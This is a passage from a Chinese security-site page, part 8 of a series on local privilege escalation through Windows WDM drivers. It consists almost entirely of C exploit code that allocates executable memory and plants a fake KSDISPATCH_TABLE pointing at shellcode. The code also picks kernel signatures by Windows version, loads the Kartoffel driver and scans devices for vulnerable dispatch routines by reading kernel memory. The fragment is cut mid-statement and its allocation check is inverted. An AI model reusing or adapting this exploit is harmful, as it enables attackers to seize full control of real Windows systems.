

利用 WDM 驱动 本地提权(8)

时间:2011-11-29 12:10来源:未知 整理:寂涯网络 点击:


                                        &dwShellSize,
                                       
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                                 PAGE_EXECUTE_READWRITE );
    if( (ULONG_PTR)addr )
    {

 printf("[*] Error while allocating memory\n");
        return 0;
    }
    printf("OK\n");
    printf("[+] Setting up the fake KSDISPATCH_TABLE ...");
    stFakeTable.Write = (ULONG_PTR) ShellCode;
    memcpy(    (void*)((ULONG_PTR)addr + 0x20),
            (void*)&stFakeTable,
            sizeof(KSDISPATCH_TABLE) );
    *(ULONG_PTR*)addr = sizeof(ULONG_PTR); // Fake FsContext
    *(ULONG_PTR*)((ULONG_PTR)addr + sizeof(ULONG_PTR)) = 0x20;
    printf("OK\n");
    /// Checking Windows Version
    CheckOS( &osVersion );
    if( !osVersion )
    {
        signature = signature_2K_SP4;
        signature_size = sizeof( signature_2K_SP4 ) - 1;
        sig_offset = 4;
    }    else     {
        signature = signature_XPSP2_Vista_2K3;
        signature_size = sizeof( signature_XPSP2_Vista_2K3 ) - 1;
        sig_offset = 8;
}
hKdevice = OpenKDevice();
    if (hKdevice == INVALID_HANDLE_VALUE) 
    {
        InitializePaths(&kDirs);
        sprintf(szKdriver,
                "%s\\kartoffel.sys",
                kDirs.KARTO_PATH);
        printf("\n\n[+] Kartoffel.sys not detected.
Loading %s\n",szKdriver);
        if( !LoadDriver( szKdriver,"KartoffelDrv") )
        {
            printf("[!] Unable to load kartoffel.sys\n");
            exit(0);
        }
   hKdevice = OpenKDevice();
        if( hKdevice == INVALID_HANDLE_VALUE ) 
            return 0;
    }
    //// Searching vulnerable devices  

dwNum = EnumDevices ( ( WCHAR** )&lpDevices );
    printf("\n[+] Searching vulnerable devices...\n\n");
    for( i = 0; i< dwNum; i++ )
    {
        printf("\r\t :: %d analyzed",i);
        dwStatus = GetDriverObjectByName ( lpDevices[i], &drvObj );
        if( dwStatus )
            {
                /// Compares IRP_MJ_**** with the signature
                dwStatus = ReadKernelMemory( ( LPVOID ) lpWrite,
                                            ( LPVOID )

本页地址 http://www.jybase.net/xitonganquan/20111129678.html
